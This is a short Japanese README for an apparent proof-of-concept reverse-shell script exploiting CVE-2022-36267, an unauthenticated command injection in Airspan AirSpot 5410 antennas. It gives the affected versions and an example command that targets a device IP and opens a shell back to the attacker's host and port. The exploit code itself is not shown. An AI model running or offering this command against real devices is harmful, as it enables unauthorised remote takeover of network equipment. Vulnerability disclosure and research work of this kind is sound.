
CVE-2022-36267のPoCスクリプト: Airspan AirSpot 5410アンテナにおける認証されていないリモートコマンドインジェクションの脆弱性を悪用します。
このリポジトリには、Airspan AirSpot 5410デバイスの重大な脆弱性であるCVE-2022-36267を悪用するための概念実証(PoC)リバースシェルスクリプトが含まれています。このスクリプトは、ブログ記事「Airspan AirSpot 5410 - 脆弱性レポート」で提供されている詳細な分析を補完する実践的なデモンストレーションです。
バージョン0.3.4.1-4以下のすべてのAirspan AirSpot 5410デバイス。
# Usage: python AirSpot-5410.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python AirSpot-5410.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

教育目的のみに使用してください。